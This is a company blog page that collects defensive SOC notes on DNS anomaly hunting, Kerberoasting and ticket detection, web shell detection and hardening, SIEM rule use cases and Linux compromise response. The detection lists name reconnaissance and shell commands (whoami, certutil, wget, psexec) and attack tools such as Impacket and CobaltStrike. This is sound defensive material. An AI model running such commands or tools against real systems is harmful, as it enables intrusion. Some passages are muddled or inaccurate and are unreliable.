Our Vision

To give customers the most compelling IT Support experience possible.

Our Mission

Our mission is simple: make technology an asset for your business not a problem.

Our Values

We strive to make technology integrate seamlessly with your business so your business can grow. As your technology partner, when your business grows ours will grow with you, therefore, we will work hand in hand with you to support your growth.

Our Values

We develop relationship that makes a positive difference in our customers Business.

Our Values

We exibit a strong will to win in the marketplace and in every aspect of our Business

Showing posts with label Tips and Tricks. Show all posts
Showing posts with label Tips and Tricks. Show all posts

DNS Logs Anomaly Hunting Checklist for Security and SOC Analyst


DNS Logs Anomaly Hunting Checklist for SOC Analyst



Check for the hosts with a high volume of uncommon record types (TXT, NULL, CNAME, etc.)


• Command and control channels may utilize specific DNS records such as ( TXT and CNAME requests ) to execute malware.


• Explore Top Level Domains, TLDs (.xyz, .me, .biz, etc ), and TLDs for geographical regions in which your organization does not regularly operate.


• The proliferation of TLDs has made it easier for attackers to continually add new domains to their infrastructure to evade threat intel lists, as well as register doppelganger domains for common websites.


• Inbound/ Outbound Requests for TLDs of geographical regions outside of your organization’s point of presence should be considered suspicious and reviewed, especially regions synonymous with cybercrime and anonymization.


• Aggregate and Filter on DNS application logs with the response code NXDOMAIN (domain does not exist) to review hosts seen with a high volume of DNS resolution failures.


• There are many benign reasons for failed DNS queries; however, the abnormal volume can be a strong indicator of possible threat activity. For example, malware utilizing Domain generation algorithms ( DGAs ) will cycle through multiple generated domains until a valid reply is received. Since most of the domains requested will not exist, it will generate a high volume of NXDOMAIN responses. In addition, abnormal NXDOMAIN volume could highlight hosts requesting malicious domains that are no longer active.


• Look for hosts with high DNS request volume for multiple subdomains of a single parent domain.


• A common method of communicating data is by including it in the query string itself in place of the subdomain (commonly encoded using Base64). Identifying requests of multiple suspicious subdomains for a specific domain could help to highlight this method of communication.


• Identify suspicious requests by reviewing queries of domains that are abnormally long, or domains with a high level of entropy.


• Hunting abnormal long queries with a high amount could help identify encoded data hidden in query strings as well as evidence of DGA domains.


• Review endpoints process names for any unusually named processes or processes that are not regularly seen generating logon requests.


• Attackers can simply register new domains to evade detection by threat intel lists. Identifying newly registered domains could help to easily identify suspicious activity.


• DNS fluxing is a technique used by attackers to hide an actual phishing or malware domain behind constantly changing compromised hosts (IP) which are acting as proxies. To accomplish this, the Time to Live (TTL) for DNS is set very low (close to 5 min) so that the changes made in DNS will reflect quickly over the internet. Because it is constantly changing, this makes it hard to identify, and take down the actual source.DNS query for a domain, having a TTL less than 5-10 mins, should be one way to hunt. Then getting different IP addresses for the same domain is also a way to hunt.


• Allowed Traffic on Port 53 Inbound Transition Control Protocol (TCP), zone transfer and should only be allowed between primary and secondary DNS servers. If zone transfer happens with an external IP/Domain which is considered as a high alert.


• DNS Should Not Query Unusual Destinations, this often indicates the potentially malicious traffic.

Kerberoasting Attack and Detection


is a common attack used by malicious actors once access is gained to a organization's internal network and a domain account is compromised. Kerberoasting allows an attacker to elevate their privileges by gaining access to passwords for service accounts on the domain.



Key Points

• Using Kerberoasting  attacker extracts service account credential hashes from Active Directory for offline cracking by exploiting a combination of weak encryption and poor service account password.  

  • Kerberoasting is effective because an attacker does not require domain administrator credentials to pull off this attack and can extract service account credential hashes without sending packets to the target.


Detecting Kerbaroasting:

  • Event ID: 4768 (Kerberos TGS Request) The Account Domain field is DOMAIN FQDN when it should be DOMAIN.
  • Event ID “4769” with the vulnerable encryption RC4 “0x17” and “0x18” types in Kerberoasting and ticket option 0x40810000.


Elements of a Kerberoasting Attack


Here is how a Kerberoasting attack works in practice:


  • To begin with, an attacker compromises the account of a domain user. The user need not have elevated or “administrator” privileges. The attacker authenticates to the domain.
  • When the malicious  user is authenticated, they receive a ticket granting ticket (TGT) from the Kerberos key distribution center (KDC) that is signed by its KRBTGT service account in Active Directory.
  • Next, the malicious actor requests a service ticket for the service they wish to compromise. The domain controller will retrieve the permissions out of the Active Directory database and create a TGS ticket, encrypting it with the service’s password. As a result, only the service and the domain controller are capable of decrypting the ticket since those are the only two entities who share the secret.
  • The domain controller provides the user with the service ticket that is then presented to the service, which will decrypt it and determine whether the user has been granted permission to access the service. At this point, an attacker may extract the ticket from system memory, and crack it offline.
  • For password cracking, tools such as Impacket, PowerSploit and Empire contain features that automate the process: requesting service tickets and returning crackable ticket hashes in formats suitable for submission to cracking tools such as John the Ripper and Hashcat, which will pry plaintext credentials from vulnerable hashes.



Finding Golden and Silver Tickets


Purpose: Identify suspicious TGT (Golden) and TGS (Silver) tickets by comparing the MaxTicketAge from the domain policy to the difference in the StartTime and EndTime of the cached authentication ticket.

Data Required : Remote Access to collect susicious tickets OR

Schedule task to write possible bad tickets to application event log for log/SIEM review

Collection Considerations : Consider running local scripts and collecting the application event log rather than a scan to reduce noise See here

Analysis Techniques:Comparative time analysis of domain policy vs cached tickets


Identify suspicious TGT (Golden) and TGS (Silver) tickets  


  • Event ID: 4624 (Account Logon)
  • The Account Domain field is DOMAIN FQDN when it should be DOMAIN.
  • Event ID: 4672 (Admin Logon)
  • Account Domain is blank & should be DOMAIN.
  • Event ID: 4768 (Kerberos TGS Request)
  • The Account Domain field is DOMAIN FQDN when it should be DOMAIN.
  • The Account Domain field is blank when it should be DOMAIN
  •  The Account Domain field is DOMAIN FQDN when it should be DOMAIN.
  •  Account Name is a different account from the Security ID.




  • BloodHound is an Active Directory (AD) reconnaissance tool.
  • BloodHound outputs results as JSON files
  • BloodHound can collect information about the following objects (users, computers, groups, gpos)
  • BloodHound can archive collected a ZIP file
  • Hunt for Suspicious Process execution via Services.exe
  • Hunt for Suspicious Process Injection

Hacking , ATT&CK phase , kill chain and incident response phases

There are some common steps used by industry and most commons in Cyber field are listed below.

 HACKING Methodology (Steps) 

Footprinting (whois,nslookup) » 

Scanning (Nmap,fping) » 

Enumeration (dumpACL, showmount, Iegion, rpcinfo » 

Gaining Access(Tcpdump) »

Escalating Privilege(John the ripper, getadmin) »

Pilfering (Rhosts. userdata, configtile. registry) » 

Covering Tracks (zap, rootkits) »

Creating Backdoors (corn, at, startup folder, keylogger, rdp) »

Denial Of Service (synk4, ping Of death). 




Resource Development » 

Initial Access» Execution »

 Persistence »

 Privilege Escalation » 

Defense Evasion» 

Credential Access » 

Discovery »

 Lateral Movement »

 Collection »

Command and Control »







Delivery » 

Exploitation »

Installation »

Command and Control » 

Action and Objective .


Incident Response: 

Identify »  Protect »  Detect »  Respond»  Recover. 

SANS Incident Response:

 Preparation »  Identification»  Containment »  Eradication »  Recovery »  Lesson Learned

Web shells Detectting and Hardening servers against webshell

web shells and its Challenges in detecting 

Web shells can be built using any of several languages that are popular with web applications. Within each language, there are several means of executing arbitrary commands and there are multiple means for arbitrary attacker input. Attackers can also hide instructions in the user agent string or any of the parameters that get passed during a web server/client exchange.
When analyzing script, it is important to leverage contextual clues. For example, a scheduled task called “Update Google” that downloads and runs code from a suspicious website should be inspected more closely.

With web shells, analyzing context can be a challenge because the context is not clear until the shell is used. In the following code, the most useful clues are “system” and “cat /etc/passwd”, but they do not appear until the attacker interacts with the web shell:

Another challenge in detecting web shells is uncovering intent. A harmless-seeming script can be malicious depending on intent. But when attackers can upload arbitrary input files in the web directory, then they can upload a full-featured web shell that allows arbitrary code execution—which some very simple web shells do.

These file-upload web shells are simple, lightweight, and easily overlooked because they cannot execute attacker commands on their own. Instead, they can only upload files, such as full-featured web shells, onto web servers. Because of their simplicity, they are difficult to detect and can be dismissed as benign, and so they are often used by attackers for persistence or for early stages of exploitation.

Finally, attackers are known to hide web shells in non-executable file formats, such as media files. Web servers configured to execute server-side code create additional challenges for detecting web shells, because on a web server, a media file is scanned for server-side execution instructions. Attackers can hide web shell scripts within a photo and upload it to a web server. When this file is loaded and analyzed on a workstation, the photo is harmless. But when a web browser asks a server for this file, malicious code executes server side.

These challenges in detecting web shells contribute to their increasing popularity as an attack tool. We constantly monitor how these evasive threats are utilized in cyber attacks, and we continue to improve protections

Web shell: Finding Web Shells

Purpose: Identify web shells (stand-alone|injected)

Data Required : Web server logs (apache, IIS, etc.)

Collection Considerations : Collect from all webservers, and ensure that parameters are collected.

POST data should be collected.

• For apache consider using mod_security or mod_dumpio

• For IIS use Failed Request Tracing / Custom Logging

Analysis Techniques:

Look for parameters passed to image files (e.g., /bad.png?zz=ls


Web logs things to notice

    • User-Agent is rare

    • User-Agent is new

    • Domain is rare

    • Domain is new

    • High frequency of http connections

    • URI is same

    • URI varies but length is constant.

    • Domain varies but length is constant

    • Missing referrer

    • Missing or same referrer to multiple uri’s on single dest.



Endpoint detection strategies:

• Look for creation of processes whose parent is the webserver (e.g., apache, w3wp.exe); these will come from functions like:

○ PHP functions like exec(), shell_exec(), etc.

○ asp(.net) functions like eval(), bind(), etc.)

• Looking for file additions or file changes (if you have a change management process and schedule to easily differentiate 'known good') -- (using something like inotify on linux (or FileSystemWatcher in .NET), to monitor the webroot folder(s) recursively)


Other Notable things:

IIS instance (w3wp.exe) running commands like ‘net’, ‘whoami’, ‘dir’, ‘cmd.exe’, or ‘query’, to name a few, is typically a strong early indicator of web shell activity.


Look for suspicious process that IIS worker process (w3wp.exe), Apache HTTP server processes (httpd.exe, visualsvnserver.exe), etc. do not typically initiate (e.g., cmd.exe and powershell.exe)


Look for suspicious web shell execution, this can identify processes that are associated with remote execution and reconnaissance activity (example: “arp”, “certutil”, “cmd”, “echo”, “ipconfig”, “gpresult”, “hostname”, “net”, “netstat”, “nltest”, “nslookup”, “ping”, “powershell”, “psexec”, “qwinsta”, “route”, “systeminfo”, “tasklist”, “wget”, “whoami”, “wmic”, etc.)



    - rundll32.exe

    - dllhost.exe


    - net.exe

    - powershell.exe

    - ipconfig.exe

    - CobaltStrike

    - BloodHound

    - nslookup.exe



        - "T1055.012 - Process Injection: Process Hollowing"

    - behavior: RUNDLL32 created ~20 instances of DLLHOST without command-line arguments.

      id: 1669ecb0-3a8a-4858-9efd-23e5c01ad643

      type: Process Created


      - C:\\Windows\\System32\\dllhost.exe

      process: C:\\Windows\\System32\\dllhost.exe

      parentProcess: C:\\Windows\\System32\\rundll32.exe


Attackers need to execute tools. Look at Windows Event ID's 4688/592. Stack and look for outliers. Group by execution time and user."


Hardening servers against web shells

A single web shell allowing attackers to remotely run commands on a server can have far-reaching consequences. With script-based malware, however, everything eventually funnels to a few natural chokepoints, such as cmd.exe, powershell.exe, and cscript.exe. As with most attack vectors, prevention is critical.

Organizations can harden systems against web shell attacks by taking these preventive steps:

  • Identify and remediate vulnerabilities or misconfigurations in web applications and web servers. Use Threat and Vulnerability Management to discover and fix these weaknesses. Deploy the latest security updates as soon as they become available.
  • Implement proper segmentation of your perimeter network, such that a compromised web server does not lead to the compromise of the enterprise network.
  • Enable antivirus protection on web servers. Turn on cloud-delivered protection to get the latest defenses against new and emerging threats. Users should only be able to upload files in directories that can be scanned by antivirus and configured to not allow server-side scripting or execution.
  • Audit and review logs from web servers frequently. Be aware of all systems you expose directly to the internet.
  • Utilize the Windows Defender Firewall, intrusion prevention devices, and your network firewall to prevent command-and-control server communication among endpoints whenever possible, limiting lateral movement, as well as other attack activities.
  • Check your perimeter firewall and proxy to restrict unnecessary access to services, including access to services through non-standard ports.
  • Practice good credential hygiene. Limit the use of accounts with local or domain admin level privileges.

CI/CD Pipelines and Automation

Modern web applications are built using modern continuous integration and deployment processes. 

This means that you run tests specific to whatever environment you are pushing to whether that's DEV, STAGING or PROD.

Control     Name          Priority          
3.1     CI/CD Pipeline     1    

Description: Implement a CI/CD pipeline  

Difficulty:      Medium     

Control     Name                           Priority     
3.2     Application Environments      2     

Description: Create separate environments for dev, staging and prod, and treat each as independent with its own data, testing and requirements     

Difficulty:    Medium   

Control     Name                               Priority            
3.3     Application Data Separation      3     

Description: Make sure that dev and test environments are not using the same data as production. If the use of live data is required then make sure that data is anonymized. 

Difficulty:   Difficult     

Control     Name                       Priority         
3.4     CI/CD Administration     3    

Description: Create and enforce user or team roles so that only the appropriate people can change or disable tests and deployment requirements

Difficulty:  Medium  

Control     Name             Priority           
3.5     Credential Store     1     

Description: Create a secure encrypted place to store senstive credentials like passwords, API keys, etc.   

 Difficulty: Medium    

Control     Name                                                       Priority           
3.6     Centralized Software Composition Analysis     1 

Description:  Scan source code for vulnerable libraries and open source software from within a CD stage   

Difficulty: Easy   

Control     Name                                     Priority  
3.7     Centralized Static Code Analysis     2    

Description: Scan source code for vulnerabilities in the source code itself from within a CD stage     

Difficulty:  Easy  

Control     Name                                     Priority    
3.8     Centralized Sensitive Data Analysis     2    

Description: Scan source code for secrets, credentials, API keys and similar from within a CD stage    

Difficulty: Easy     

Control     Name                                                                  Priority
Dynamic Application Security Testing -DAST             3                        

Description:Scan running application for vulnerabilities

SIEM Rules from Event log ID and use cases

 Below are some guidance on rule creation and what event to look for:
Collection - Domain Controller - User Activity - Network Share Accessed
This rule looks for Windows Event ID 5140 which indicates that a network share has been accessed. When on Workstations or Domain controllers, this event can be used to identify access to C$ or Admin$. Common false positives will be IPC$, \Sysvol, \Netlogon.
Credential Access - AD - Account Lockout - Service Account
Event ID 4740
Defense Evasion - Domain Controller - System Change - Event Logs Cleared
Identifies the deletion of event logs from a windows host or domain controller. This may be performed to destroy evidence of malicious activity on a system.
Event ID 1102
Discovery - AD - Account Enumeration - Host
Event ID 4771, 4625,4768
Discovery - AD - Kerberoasting
This rule looks for activity on Active Directory indicative of Kerberoasting attacks. Kerberoasting is where an attacker cracks a Kerberos service ticket and rewrites them in order to gain access to a targeted service.
Event ID 4769
Execution - Network - Access Attempt - Unicode Domain
Identifies web requests where the website domain contains Unicode characters. Unicode allows the display of foreign characters within the URL bar and can be used to attempt to trick users to go to malicious websites.
URL is : *?xn--.*? Log source : web proxy Server and Firewalls
Exfiltration - Email - Auto Forwarding
This rule looks for many emails from a single internal user going to an external email address, indicative of a user forwarding their external mail content to a personal mailbox.
Vendor Msg id is : send , and status is: originating
Initial Access - ADFS - Excessive Login Failures
Identifies a large volume of ADFS failures, which may indicate account enumeration, brute-force login activity or a client misconfiguration.
Event ID 1201,1203,1205
Initial Access - Remote Access - Login Attempt - Different Geos
Identifies VPN login attempts by the same user across geographically distant locations in a short time period. This may indicate account compromise, especially if the user is not traveling.

Lateral Movement - Domain Controller - Login Attempt - Interactive
Identifies a remote interactive login to a domain controller.
Event ID 4624 and Session type is 10,2
Persistence - Domain Controller - System Change - Audit Policy Changed
Identifies system audit policy changes on windows hosts. This represents a change to the type of security events logged by the system and may be a pre-attack activity to avoid detection.
Event ID 4719,4905,4912
Persistence - Domain Controller - System Change - Domain Policy Changed
Event ID 4739
Persistence - Domain Controller - System Change - Multiple Processes Created
Identifies a large number of processes being created in a short time on a monitored windows host. The presence of an abnormal volume of abnormal processes may indicate the host has been compromised or is being misused.
Event ID 4688  Unique value>=10
Persistence - Domain Controller - System Change - Scheduled Task
Identifies the creation of new scheduled tasks as well as changes to existing tasks. The creation of new scheduled tasks or the removal of existing ones may be technique to maintain persistence.
Event ID:4698,4699,4700,4701,4702
Persistence - Domain Controller - System Change - Service Installed
Identifies the installation of unexpected services on a system. The installation of unexpected services may be an indicator of system compromise or misuse.
Event ID: 7045,4697,601
Privilege Escalation - AD - Group Change - Admin
Identifies attempts to change a user's group membership in AD. The high risk associated with delegating certain permissions in AD warrants a high level of scrutiny. For example, the promotion of a domain user to domain admin.
Event ID: 4728,4732,4746,4751,4756,4761
Privilege Escalation - ATP - Golden Ticket
This rule looks for Golden Ticket related activity identified by Azure ATP. See here for more details: https://docs.microsoft.com/en-us/azure-advanced-threat-protection/suspicious-activity-guide?tabs=external.
Event ID 2009,2013,2027,2032,2022
Hunting the Fileless Malware & Powershell Activities:
Event IDs (4104, 4103, and 4688)
  • Event ID 4103 – Module logging – Attackers uses several obfuscated commands and calls self-defined variables and system commands , Hunting these Event ID provides soc operations to record all the obfuscated commands as pipeline execution details under the event ID 4103.It should be enabled to process and get the malicious commands.
  • Event ID 4104 – Powershell Script Block Logging – Captures the entire scripts that are executed by remote machines. For Example Obfuscated scripts that are decoded and executed at the run time.This gives additional visibility on remote command.
  • If an event exceeds the maximum event log message size, script block logging will split the logged events into multiple events and Suspicious commands can be observed at the logging level of “warning”.
USE CASE: DNS QUERY Objective: The mission of this hunt is to drill down DNS logs to baseline common domains queried by endpoints in the environment as well as identify potentially infected endpoints by looking for possible DNS tunneling, domain generation algorithm (DGA) domains, and traffic to risky top-level domains (TLDs).
Log Source & Requirements: DNS query logging
Duration: 30 Days

Linux Compromises & Access Tools and Where to Find Them

 Linux compromises 

  • Linux systems are 'occasionally' targeted by actors, especially cryptomining and ransomware crews.
  • This process can be similar to Windows machine compromises but some areas are specific to each flavour
  • The below are a brief overview of the exploitation, protection, detection and remediation processes of Linux operating systems.

    • Same process as windows devices:
    • Exploit external facing service
    • Establish persistence
    • Collect credentials
    • Move laterally
    • Similar to Windows:
    • Patch
    • Including applications
    • Cron job with apt / yum update
    • Limit number of admins with sudo powers
    • Application whitelisting (fapolicyd)
    • ACSC also have a Linux hardening worksheet which could be useful (Hardening Linux Workstations and Servers)

    • Utilising Logs
    • Weblogs
    • Exploitation attempts
    • Webshells
    • Commandline logging
    • SSH logs
    • Memory images (which I don’t think is a viable way for continuous detection, for incident response more likely)
    • Use Yara rules to search for malware; Volatility plugin


Process data:

    • ps -eaf
    • pstree


Get service (cron) data:

    • ls -la /etc/cron*
    • Cron jobs redirecting to "> /dev/null" are worth checking out
    • Change passwords
    • Regenerate keys (e.g. In ssh)
    • Remove added users
    • Clean off malware (webshells, scripts, implants)
    • Remove cron jobs
    • Monitor for reconnection attempts (from known malicious IPs)


Fantastic Access Tools
    •   Attackers are increasingly using remote access tools to gain and maintain access to the network, through the utilisation of either:
    • Tools already deployed (and obtaining creds)
    • Deploying own software

Generic detection to help find these tools in your org
    • Event 4688 - process names
    • Event 4697 - service creation event (if tool was installed as a service)
    • Sysmon - process names, DNS lookups / network traffic to known RMT domains
    • Firewall logs - connections classified as app
    • Can also manually check with a host using:
    • Wmic /node:<target> process list


Tool brief overviews
  • Recent report: Anomali, ‘ScreenConnect Remote Access Tool Utilizing Ministry of Foreign Affairs-Themed EXEs and URLs’
    • DameWare
    • Requires incoming connection from the internet on various ports
    • Connects to IPv6 local host
    • Shodan.io - product:dameware
    • Dwrcs.exe
    • GoToAssist
    • Generates outgoing HTTP/S traffic - look for logmein or gotoassist
    • Gotoassist.exe
    • ConnectWiseControl / ScreenConnect
    • Generates outgoing HTTP/S traffic
    • Screenconnect.clientservice.exe
    • Commonly used for phishing emails with a URL that deploys ScreenConnect directly
    • Keep an eye out for any remote management/access tools
    • Most of them will probably be "legit". If they are, ensure they:
    • Use MFA
    • Turn on logging
    • Manage the users
    • Turn off processes when not in use

  • SDBBot is a remote access trojan identified by Proofpoint in 2019. The ACSC issued an alert in November last year about increased sightings in attacks targeting healthcare. It's often used to drop ransomware.
  • Initial infection is usually via ISO or Excel email attachments. It sends C&C traffic over port 443 in a plaintext protocol. 

    • Microsoft's Attack Surface Reduction rules
    • Block ISO attachments and downloads 
    • Block non-HTTPS traffic over port 443

'Lo-Tech OT hacking'
  • A general primer on finding and securing 'human-machine interfaces', or HMIs - i.e. dashboards for SCADA/OT equipment.
  • Common exposed HMIs include HVACs, fridges, etc. 
  • Cool Shodan search: https://www.shodan.io/search?query=screenshot.label%3Aics
  • HMIs are easy to find and access. Targeted industrial sabotage is unlikely; most hackers are bored and poking at low-hanging fruit. 
  • This maps with OTORIO's report about the Israeli reservoir 'hack' in December. They concluded that the attackers likely 'did not possess any deep industrial capabilities or knowledge' and targeted the system solely because it was unprotected. 
  • Note:  we calle attacks on these devices 'annoying' but 'unlikely to be dangerous'. An attendee pointed out that a hacked fridge could be catastrophic for a hospital or pharmacy storing temperature-controlled medications.

  • Recommendation is network scanning and searching Shodan for modbus and dnp3, plus other common HMI ports and protocols. 
Teamviewer and remote access security
  • In light of the Florida water incident, they added some points about securing remote access/support tools. Nothing too exciting, just 'figure out what tools are in use at your organization' and 'maybe try to secure them?' 
  • Apparently there will be a more detailed brief on this incident later.

Twitter Facebook Favorites More